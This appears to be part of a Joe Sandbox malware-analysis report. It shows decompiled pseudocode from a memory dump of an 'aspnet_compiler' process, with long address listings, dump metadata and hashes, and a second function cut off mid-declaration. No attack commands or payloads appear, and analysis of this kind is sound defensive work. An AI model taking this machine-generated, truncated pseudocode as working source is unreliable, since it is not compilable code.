													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E011D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E011DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E011DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E011DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E011DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E011DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E011DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E011DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01264CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E011ED130(_t427, _t494, _t511);
				}
			}










































































                                                                                        0x01265ba5
                                                                                        0x01265baa
                                                                                        0x01265baf
                                                                                        0x01265bb4
                                                                                        0x01265bb6
                                                                                        0x01265bbc
                                                                                        0x01265bbe
                                                                                        0x01265bc4
                                                                                        0x01265bcd
                                                                                        0x01265bd3
                                                                                        0x01265bd6
                                                                                        0x01265bdc
                                                                                        0x01265be0
                                                                                        0x01265be3
                                                                                        0x01265beb
                                                                                        0x01265bf2
                                                                                        0x01265bf8
                                                                                        0x01265bfe
                                                                                        0x01265c04
                                                                                        0x01265c0e
                                                                                        0x01265c18
                                                                                        0x01265c1f
                                                                                        0x01265c25
                                                                                        0x01265c2a
                                                                                        0x01265c2c
                                                                                        0x01265c32
                                                                                        0x01265c3a
                                                                                        0x01265c3f
                                                                                        0x01265c42
                                                                                        0x01265c48
                                                                                        0x01265c5b
                                                                                        0x01265c5b
                                                                                        0x01265c2c
                                                                                        0x01265cb7
                                                                                        0x01265cb9
                                                                                        0x01265cbf
                                                                                        0x01265cc2
                                                                                        0x01265cca
                                                                                        0x01265ccb
                                                                                        0x01265ccb
                                                                                        0x01265cd1
                                                                                        0x01265cd7
                                                                                        0x01265cda
                                                                                        0x01265ce1
                                                                                        0x01265ce4
                                                                                        0x01265ce7
                                                                                        0x01265ced
                                                                                        0x01265cf3
                                                                                        0x01265cf9
                                                                                        0x01265cff
                                                                                        0x01265d08
                                                                                        0x01265d0a
                                                                                        0x01265d0e
                                                                                        0x01265d10
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d16
                                                                                        0x01265d1a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d20
                                                                                        0x01265d22
                                                                                        0x01265d25
                                                                                        0x01265d2f
                                                                                        0x01265d2f
                                                                                        0x01265d33
                                                                                        0x01265d3d
                                                                                        0x01265d49
                                                                                        0x01265d4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d5a
                                                                                        0x01265d5d
                                                                                        0x01265d60
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d66
                                                                                        0x01265d69
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d6f
                                                                                        0x01265d6f
                                                                                        0x01265d73
                                                                                        0x01265d79
                                                                                        0x01265d7f
                                                                                        0x01265d86
                                                                                        0x01265d95
                                                                                        0x01265d98
                                                                                        0x01265dba
                                                                                        0x01265dcb
                                                                                        0x01265dce
                                                                                        0x01265dd3
                                                                                        0x01265dd6
                                                                                        0x01265dd8
                                                                                        0x01265de6
                                                                                        0x01265dec
                                                                                        0x01265dee
                                                                                        0x01265df1
                                                                                        0x01265df3
                                                                                        0x0126635a
                                                                                        0x0126635a
                                                                                        0x00000000
                                                                                        0x0126635a
                                                                                        0x01265dfe
                                                                                        0x01265e02
                                                                                        0x01265e05
                                                                                        0x01265e07
                                                                                        0x01265e10
                                                                                        0x01265e13
                                                                                        0x01265e1b
                                                                                        0x01265e1c
                                                                                        0x01265e21
                                                                                        0x01265e22
                                                                                        0x01265e23
                                                                                        0x01265e25
                                                                                        0x01265e2a
                                                                                        0x01265e2c
                                                                                        0x01265e2e
                                                                                        0x01265e36
                                                                                        0x01265e39
                                                                                        0x01265e42
                                                                                        0x01265e47
                                                                                        0x01265e4d
                                                                                        0x01265e54
                                                                                        0x01265e54
                                                                                        0x01265e54
                                                                                        0x01265e2e
                                                                                        0x01265e5c
                                                                                        0x01265e5f
                                                                                        0x01265e62
                                                                                        0x01265e64
                                                                                        0x01265e6b
                                                                                        0x01265e70
                                                                                        0x01265e7a
                                                                                        0x01265e7a
                                                                                        0x01265e7a
                                                                                        0x01265e6b
                                                                                        0x01265e7e
                                                                                        0x01265e7f
                                                                                        0x01265e7f
                                                                                        0x01265e81
                                                                                        0x01265e87
                                                                                        0x01265e8b
                                                                                        0x01265e8c
                                                                                        0x01265e8c
                                                                                        0x01265e8c
                                                                                        0x01265e9a
                                                                                        0x01265e9c
                                                                                        0x01265ea2
                                                                                        0x01265ea6
                                                                                        0x01265f50
                                                                                        0x01265f50
                                                                                        0x01265f57
                                                                                        0x01265f66
                                                                                        0x01265f66
                                                                                        0x01265f66
                                                                                        0x01265f68
                                                                                        0x01265f6a
                                                                                        0x012663d0
                                                                                        0x00000000
                                                                                        0x01265f70
                                                                                        0x01265f70
                                                                                        0x01265f91
                                                                                        0x01265f9c
                                                                                        0x01265f9e
                                                                                        0x01265fa4
                                                                                        0x01265fa6
                                                                                        0x0126638c
                                                                                        0x01266392
                                                                                        0x012663a1
                                                                                        0x012663a7
                                                                                        0x012663af
                                                                                        0x012663af
                                                                                        0x012663bd
                                                                                        0x012663d8
                                                                                        0x00000000
                                                                                        0x012663d8
                                                                                        0x01265fac
                                                                                        0x01265fb2
                                                                                        0x01265fb4
                                                                                        0x01265fbd
                                                                                        0x01265fc6
                                                                                        0x01265fce
                                                                                        0x01265fd4
                                                                                        0x01265fdc
                                                                                        0x01265fec
                                                                                        0x01265fed
                                                                                        0x01265fee
                                                                                        0x01265fef
                                                                                        0x01265ff9
                                                                                        0x01265ffa
                                                                                        0x01265ffb
                                                                                        0x01265ffc
                                                                                        0x01266000
                                                                                        0x01266004
                                                                                        0x01266012
                                                                                        0x01266012
                                                                                        0x01266018
                                                                                        0x01266019
                                                                                        0x0126601a
                                                                                        0x0126601b
                                                                                        0x0126601c
                                                                                        0x01266020
                                                                                        0x01266059
                                                                                        0x0126605c
                                                                                        0x01266061
                                                                                        0x01266061
                                                                                        0x01266022
                                                                                        0x01266022
                                                                                        0x01266022
                                                                                        0x01266025
                                                                                        0x0126602a
                                                                                        0x0126602b
                                                                                        0x01266031
                                                                                        0x01266037
                                                                                        0x01266038
                                                                                        0x0126603e
                                                                                        0x01266048
                                                                                        0x01266049
                                                                                        0x0126604a
                                                                                        0x0126604b
                                                                                        0x0126604c
                                                                                        0x0126604d
                                                                                        0x01266053
                                                                                        0x01266054
                                                                                        0x01266054
                                                                                        0x01266062
                                                                                        0x01266065
                                                                                        0x01266067
                                                                                        0x0126606a
                                                                                        0x01266070
                                                                                        0x01266075
                                                                                        0x01266076
                                                                                        0x01266081
                                                                                        0x01266087
                                                                                        0x01266095
                                                                                        0x01266099
                                                                                        0x0126609e
                                                                                        0x012660a4
                                                                                        0x012660ae
                                                                                        0x012660b0
                                                                                        0x012660b3
                                                                                        0x012660b6
                                                                                        0x012660b8
                                                                                        0x012660ba
                                                                                        0x012660ba
                                                                                        0x012660ba
                                                                                        0x012660ba
                                                                                        0x012660be
                                                                                        0x012660c0
                                                                                        0x012660c5
                                                                                        0x012660c5
                                                                                        0x012660c5
                                                                                        0x012660c6
                                                                                        0x012660cd
                                                                                        0x01266114
                                                                                        0x012660cf
                                                                                        0x012660cf
                                                                                        0x012660d4
                                                                                        0x012660d5
                                                                                        0x012660da
                                                                                        0x012660db
                                                                                        0x012660e1
                                                                                        0x012660e2
                                                                                        0x012660e8
                                                                                        0x012660f8
                                                                                        0x012660fd
                                                                                        0x012660fe
                                                                                        0x01266102
                                                                                        0x01266104
                                                                                        0x01266107
                                                                                        0x01266109
                                                                                        0x0126610b
                                                                                        0x0126610b
                                                                                        0x0126610b
                                                                                        0x0126610b
                                                                                        0x0126610f
                                                                                        0x0126610f
                                                                                        0x01266117
                                                                                        0x0126611a
                                                                                        0x0126611f
                                                                                        0x01266125
                                                                                        0x01266134
                                                                                        0x01266139
                                                                                        0x0126613f
                                                                                        0x01266146
                                                                                        0x01266148
                                                                                        0x0126614b
                                                                                        0x0126614d
                                                                                        0x0126614f
                                                                                        0x0126614f
                                                                                        0x0126614f
                                                                                        0x0126614f
                                                                                        0x01266153
                                                                                        0x01266159
                                                                                        0x01266159
                                                                                        0x0126615c
                                                                                        0x01266163
                                                                                        0x01266169
                                                                                        0x0126616c
                                                                                        0x01266172
                                                                                        0x01266181
                                                                                        0x01266186
                                                                                        0x01266187
                                                                                        0x0126618b
                                                                                        0x01266191
                                                                                        0x01266195
                                                                                        0x012661a3
                                                                                        0x012661bb
                                                                                        0x012661c0
                                                                                        0x012661c3
                                                                                        0x012661cc
                                                                                        0x012661d0
                                                                                        0x012661dc
                                                                                        0x012661de
                                                                                        0x012661e1
                                                                                        0x012661e4
                                                                                        0x012661e6
                                                                                        0x012661e8
                                                                                        0x012661e8
                                                                                        0x012661e8
                                                                                        0x012661e8
                                                                                        0x012661e6
                                                                                        0x012661ec
                                                                                        0x012661f3
                                                                                        0x01266203
                                                                                        0x01266209
                                                                                        0x0126620a
                                                                                        0x01266216
                                                                                        0x0126621d
                                                                                        0x01266227
                                                                                        0x01266241
                                                                                        0x01266246
                                                                                        0x0126624c
                                                                                        0x01266257
                                                                                        0x01266259
                                                                                        0x0126625c
                                                                                        0x0126625e
                                                                                        0x01266260
                                                                                        0x01266260
                                                                                        0x01266260
                                                                                        0x01266260
                                                                                        0x0126625e
                                                                                        0x01266264
                                                                                        0x01266267
                                                                                        0x01266269
                                                                                        0x01266315
                                                                                        0x01266315
                                                                                        0x0126631b
                                                                                        0x0126631e
                                                                                        0x01266324
                                                                                        0x01266327
                                                                                        0x0126632f
                                                                                        0x01266330
                                                                                        0x01266333
                                                                                        0x0126633a
                                                                                        0x0126633c
                                                                                        0x01266335
                                                                                        0x01266335
                                                                                        0x01266335
                                                                                        0x0126633f
                                                                                        0x01266342
                                                                                        0x0126634c
                                                                                        0x01266352
                                                                                        0x01266355
                                                                                        0x01266355
                                                                                        0x01266359
                                                                                        0x00000000
                                                                                        0x0126626f
                                                                                        0x01266275
                                                                                        0x01266275
                                                                                        0x01266278
                                                                                        0x0126627e
                                                                                        0x0126627e
                                                                                        0x01266281
                                                                                        0x01266287
                                                                                        0x0126628d
                                                                                        0x01266298
                                                                                        0x0126629c
                                                                                        0x012662a2
                                                                                        0x0126629e
                                                                                        0x0126629e
                                                                                        0x0126629e
                                                                                        0x012662a7
                                                                                        0x012662a7
                                                                                        0x012662aa
                                                                                        0x012662b0
                                                                                        0x012662f0
                                                                                        0x012662f0
                                                                                        0x012662f2
                                                                                        0x012662f8
                                                                                        0x012662fd
                                                                                        0x012662b2
                                                                                        0x012662b2
                                                                                        0x012662b2
                                                                                        0x012662b5
                                                                                        0x012662dd
                                                                                        0x012662e2
                                                                                        0x012662e5
                                                                                        0x012662b7
                                                                                        0x012662b8
                                                                                        0x012662bb
                                                                                        0x012662bd
                                                                                        0x012662c0
                                                                                        0x012662c4
                                                                                        0x012662cd
                                                                                        0x012662cd
                                                                                        0x012662c0
                                                                                        0x012662bb
                                                                                        0x012662b5
                                                                                        0x01266302
                                                                                        0x01266303
                                                                                        0x01266305
                                                                                        0x01266305
                                                                                        0x01266305
                                                                                        0x0126630c
                                                                                        0x0126630c
                                                                                        0x00000000
                                                                                        0x0126627e
                                                                                        0x01266269
                                                                                        0x01265eac
                                                                                        0x01265ebb
                                                                                        0x01265ebe
                                                                                        0x01265ecb
                                                                                        0x01265ecb
                                                                                        0x01265ece
                                                                                        0x01265ece
                                                                                        0x01265ed4
                                                                                        0x01265ed7
                                                                                        0x01265ed9
                                                                                        0x01265edb
                                                                                        0x01265edb
                                                                                        0x01265ee1
                                                                                        0x01265ee1
                                                                                        0x01265ee3
                                                                                        0x01265f20
                                                                                        0x01265f20
                                                                                        0x01265ee5
                                                                                        0x01265ee5
                                                                                        0x01265ee5
                                                                                        0x01265ee8
                                                                                        0x01265f11
                                                                                        0x01265f18
                                                                                        0x01265eea
                                                                                        0x01265eea
                                                                                        0x01265eed
                                                                                        0x01265ef2
                                                                                        0x01265ef8
                                                                                        0x01265efb
                                                                                        0x01265f0a
                                                                                        0x01265f0a
                                                                                        0x01265eed
                                                                                        0x01265ee8
                                                                                        0x01265f22
                                                                                        0x01265f28
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265f30
                                                                                        0x01265f31
                                                                                        0x01265f37
                                                                                        0x01265f3a
                                                                                        0x01265f3d
                                                                                        0x01265f44
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265f46
                                                                                        0x01265f48
                                                                                        0x01265f4d
                                                                                        0x00000000
                                                                                        0x01265f4d
                                                                                        0x01265dda
                                                                                        0x01265ddf
                                                                                        0x00000000
                                                                                        0x01265ddf
                                                                                        0x01265dd8
                                                                                        0x01265da7
                                                                                        0x01265da9
                                                                                        0x01265dac
                                                                                        0x01265dae
                                                                                        0x00000000
                                                                                        0x01265db4
                                                                                        0x01265db4
                                                                                        0x00000000
                                                                                        0x01265db4
                                                                                        0x01265dae
                                                                                        0x01265d88
                                                                                        0x01265d8d
                                                                                        0x01266363
                                                                                        0x01266369
                                                                                        0x0126636a
                                                                                        0x01266370
                                                                                        0x01266372
                                                                                        0x0126637a
                                                                                        0x0126637b
                                                                                        0x0126637d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0126637f
                                                                                        0x01266385
                                                                                        0x00000000
                                                                                        0x01266385
                                                                                        0x01265d38
                                                                                        0x01265d3b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01265d3b
                                                                                        0x01265d27
                                                                                        0x01265d29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01266360
                                                                                        0x00000000
                                                                                        0x01266360
                                                                                        0x01265c10
                                                                                        0x01265c10
                                                                                        0x012663da
                                                                                        0x012663e5
                                                                                        0x012663e5

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3b5a5ba89510c41f140894de62589e72574e1d461247281fd0adbab3ad0d4df5
                                                                                        • Instruction ID: e79527ee20d17236b684135386b09cd00f45b1b9a27fa92710b010362fc87878
                                                                                        • Opcode Fuzzy Hash: 3b5a5ba89510c41f140894de62589e72574e1d461247281fd0adbab3ad0d4df5
                                                                                        • Instruction Fuzzy Hash: 11425C7192022ACFDB24CF68C881BA9BBB5FF45704F1481AAD94DEB282D77499C5CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011B4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E011B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
